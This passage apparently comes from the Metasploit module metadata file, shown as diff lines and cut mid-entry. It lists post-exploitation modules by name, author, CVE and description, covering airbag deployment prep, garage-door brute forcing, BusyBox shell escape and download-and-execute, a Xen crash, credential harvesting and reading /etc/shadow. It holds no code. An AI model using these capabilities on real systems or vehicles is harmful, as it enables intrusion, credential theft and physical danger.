"Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/mazda_ic_mover.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/mazda_ic_mover", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/automotive/pdt": { - "name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)", - "fullname": "post/hardware/automotive/pdt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Johannes Braun", - "Juergen Duerrwang", - "Craig Smith" - ], - "description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)", - "references": [ - "CVE-2017-14937", - "URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/automotive/pdt.rb", - "is_install_path": true, - "ref_name": "hardware/automotive/pdt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/rftransceiver/rfpwnon": { - "name": "Brute Force AM/OOK (ie: Garage Doors)", - "fullname": "post/hardware/rftransceiver/rfpwnon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Corey Harding", - "Craig Smith" - ], - "description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.", - "references": [ - "URL-https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/rftransceiver/rfpwnon.rb", - "is_install_path": true, - "ref_name": "hardware/rftransceiver/rfpwnon", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/rftransceiver/transmitter": { - "name": "RF Transceiver Transmitter", - "fullname": "post/hardware/rftransceiver/transmitter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.", - "references": [ - "URL-https://github.com/AndrewMohawk/RfCatHelpers" - ], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-29 01:52:00 +0000", - "path": "/modules/post/hardware/rftransceiver/transmitter.rb", - "is_install_path": true, - "ref_name": "hardware/rftransceiver/transmitter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "physical-effects" - ], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_hardware/zigbee/zstumbler": { - "name": "Sends Beacons to Scan for Active ZigBee Networks", - "fullname": "post/hardware/zigbee/zstumbler", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Craig Smith" - ], - "description": "Send beacon signals to the broadcast address while channel hopping.", - "references": [], - "platform": "Hardware", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 20:12:59 +0000", - "path": "/modules/post/hardware/zigbee/zstumbler.rb", - "is_install_path": true, - "ref_name": "hardware/zigbee/zstumbler", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "hwbridge" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/enum_connections": { - "name": "BusyBox Enumerate Connections", - "fullname": "post/linux/busybox/enum_connections", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will\n enumerate the connections established with the router or device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/enum_connections.rb", - "is_install_path": true, - "ref_name": "linux/busybox/enum_connections", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/enum_hosts": { - "name": "BusyBox Enumerate Host Names", - "fullname": "post/linux/busybox/enum_hosts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/enum_hosts.rb", - "is_install_path": true, - "ref_name": "linux/busybox/enum_hosts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/jailbreak": { - "name": "BusyBox Jailbreak ", - "fullname": "post/linux/busybox/jailbreak", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/jailbreak.rb", - "is_install_path": true, - "ref_name": "linux/busybox/jailbreak", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/ping_net": { - "name": "BusyBox Ping Network Enumeration", - "fullname": "post/linux/busybox/ping_net", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/ping_net.rb", - "is_install_path": true, - "ref_name": "linux/busybox/ping_net", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/set_dmz": { - "name": "BusyBox DMZ Configuration", - "fullname": "post/linux/busybox/set_dmz", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It allows to manage\n traffic forwarding to a target host through the BusyBox device.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/set_dmz.rb", - "is_install_path": true, - "ref_name": "linux/busybox/set_dmz", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/set_dns": { - "name": "BusyBox DNS Configuration", - "fullname": "post/linux/busybox/set_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/set_dns.rb", - "is_install_path": true, - "ref_name": "linux/busybox/set_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/smb_share_root": { - "name": "BusyBox SMB Sharing", - "fullname": "post/linux/busybox/smb_share_root", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will modify\n the SMB configuration of the device executing BusyBox to share the root directory of\n the device.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/smb_share_root.rb", - "is_install_path": true, - "ref_name": "linux/busybox/smb_share_root", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/busybox/wget_exec": { - "name": "BusyBox Download and Execute", - "fullname": "post/linux/busybox/wget_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Vicente Vallejo" - ], - "description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/busybox/wget_exec.rb", - "is_install_path": true, - "ref_name": "linux/busybox/wget_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/dos/xen_420_dos": { - "name": "Linux DoS Xen 4.2.0 2012-5525", - "fullname": "post/linux/dos/xen_420_dos", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Christoph Sendner ", - "Aleksandar Milenkoski " - ], - "description": "This module causes a hypervisor crash in Xen 4.2.0 when invoked from a\n paravirtualized VM, including from dom0. Successfully tested on Debian 7\n 3.2.0-4-amd64 with Xen 4.2.0.", - "references": [ - "CVE-2012-5525" - ], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/dos/xen_420_dos.rb", - "is_install_path": true, - "ref_name": "linux/dos/xen_420_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ansible": { - "name": "Ansible Config Gather", - "fullname": "post/linux/gather/ansible", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die" - ], - "description": "This module will grab ansible information including hosts, ping status, and the configuration file.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/ansible.rb", - "is_install_path": true, - "ref_name": "linux/gather/ansible", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ansible_playbook_error_message_file_reader": { - "name": "Ansible Playbook Error Message File Reader", - "fullname": "post/linux/gather/ansible_playbook_error_message_file_reader", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "rioasmara" - ], - "description": "This module will read the first line of a file based on an error message from ansible-playbook with sudo privileges.\n ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line\n where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read\n /etc/shadow to obtain root's hash.", - "references": [ - "URL-https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb", - "is_install_path": true, - "ref_name": "linux/gather/ansible_playbook_error_message_file_reader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/apache_nifi_credentials": { - "name": "Apache NiFi Credentials Gather", - "fullname": "post/linux/gather/apache_nifi_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die", - "Topaco" - ], - "description": "This module will grab Apache NiFi credentials from various files on Linux.", - "references": [ - "URL-https://stackoverflow.com/questions/77391210/python-vs-ruby-aes-pbkdf2", - "URL-https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#nifi_sensitive_props_key" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/gather/apache_nifi_credentials.rb", - "is_install_path": true, - "ref_name": "linux/gather/apache_nifi_credentials", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/checkcontainer": { - "name": "Linux Gather Container Detection", - "fullname": "post/linux/gather/checkcontainer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "James Otten " - ], - "description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, WSL, LXC, Podman and systemd nspawn.", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-04-26 21:58:43 +0000", - "path": "/modules/post/linux/gather/checkcontainer.rb", - "is_install_path": true, - "ref_name": "linux/gather/checkcontainer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/checkvm": { - "name": "Linux Gather Virtual Environment Detection", - "fullname": "post/linux/gather/checkvm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n Bhyve and QEMU/KVM.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/checkvm.rb", - "is_install_path": true, - "ref_name": "linux/gather/checkvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/ecryptfs_creds": { - "name": "Gather eCryptfs Metadata", - "fullname": "post/linux/gather/ecryptfs_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Dhiru Kholia " - ], - "description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/ecryptfs_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/ecryptfs_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_commands": { - "name": "Gather Available Shell Commands", - "fullname": "post/linux/gather/enum_commands", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will check which shell commands are available on a system.\"", - "references": [], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-12-20 23:42:51 +0000", - "path": "/modules/post/linux/gather/enum_commands.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_commands", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_configs": { - "name": "Linux Gather Configurations", - "fullname": "post/linux/gather/enum_configs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_configs.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_configs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_containers": { - "name": "Linux Container Enumeration", - "fullname": "post/linux/gather/enum_containers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "stealthcopter" - ], - "description": "This module attempts to enumerate containers on the target machine and optionally run a command on each active container found.\n Currently it supports Docker, LXC and RKT.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/linux/gather/enum_containers.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_containers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_nagios_xi": { - "name": "Nagios XI Enumeration", - "fullname": "post/linux/gather/enum_nagios_xi", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-04-17", - "type": "post", - "author": [ - "Cale Smith" - ], - "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_nagios_xi.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_nagios_xi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "post_linux/gather/enum_network": { - "name": "Linux Gather Network Information", - "fullname": "post/linux/gather/enum_network", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae ", - "Stephen Haywood " - ], - "description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_network.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_network", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_protections": { - "name": "Linux Gather Protection Enumeration", - "fullname": "post/linux/gather/enum_protections", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 23:10:40 +0000", - "path": "/modules/post/linux/gather/enum_protections.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_protections", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_psk": { - "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials", - "fullname": "post/linux/gather/enum_psk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Cenk Kalpakoglu" - ], - "description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from Linux NetworkManager\n connection configuration files.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-21 00:28:34 +0000", - "path": "/modules/post/linux/gather/enum_psk.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_psk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_system": { - "name": "Linux Gather System and User Information", - "fullname": "post/linux/gather/enum_system", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Stephen Haywood ", - "sinn3r ", - "ohdae ", - "Roberto Espreto " - ], - "description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_system.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_system", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/enum_users_history": { - "name": "Linux Gather User History", - "fullname": "post/linux/gather/enum_users_history", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "ohdae " - ], - "description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/enum_users_history.rb", - "is_install_path": true, - "ref_name": "linux/gather/enum_users_history", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/f5_loot_mcp": { - "name": "F5 Big-IP Gather Information from MCP Datastore", - "fullname": "post/linux/gather/f5_loot_mcp", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-11-16", - "type": "post", - "author": [ - "Ron Bowes" - ], - "description": "This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb", - "references": [ - "URL-https://github.com/rbowes-r7/refreshing-mcp-tool", - "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", - "URL-https://support.f5.com/csp/article/K97843387" - ], - "platform": "Linux,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/linux/gather/f5_loot_mcp.rb", - "is_install_path": true, - "ref_name": "linux/gather/f5_loot_mcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/gnome_commander_creds": { - "name": "Linux Gather Gnome-Commander Creds", - "fullname": "post/linux/gather/gnome_commander_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/gnome_commander_creds.rb", - "is_install_path": true, - "ref_name": "linux/gather/gnome_commander_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/gnome_keyring_dump": { - "name": "Gnome-Keyring Dump", - "fullname": "post/linux/gather/gnome_keyring_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Spencer McIntyre" - ], - "description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-27 12:23:56 +0000", - "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", - "is_install_path": true, - "ref_name": "linux/gather/gnome_keyring_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/gather/haserl_read": { - "name": "Haserl Arbitrary File Reader", - "fullname": "post/linux/gather/haserl_read", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Julien (jvoisin) Voisin", - "Ike Broflovski" - ], - "description": "This module exploits haserl prior to 0.9.36 to read arbitrary files.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", - "references": [ - "URL-https://twitter.com/steaIth/status/1364940271054712842", - "URL-https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539", - "CVE-2021-29133" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/linux/gather/haserl_read.rb", - "is_install_path": true, - "ref_name": "linux/gather/haserl_read", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] 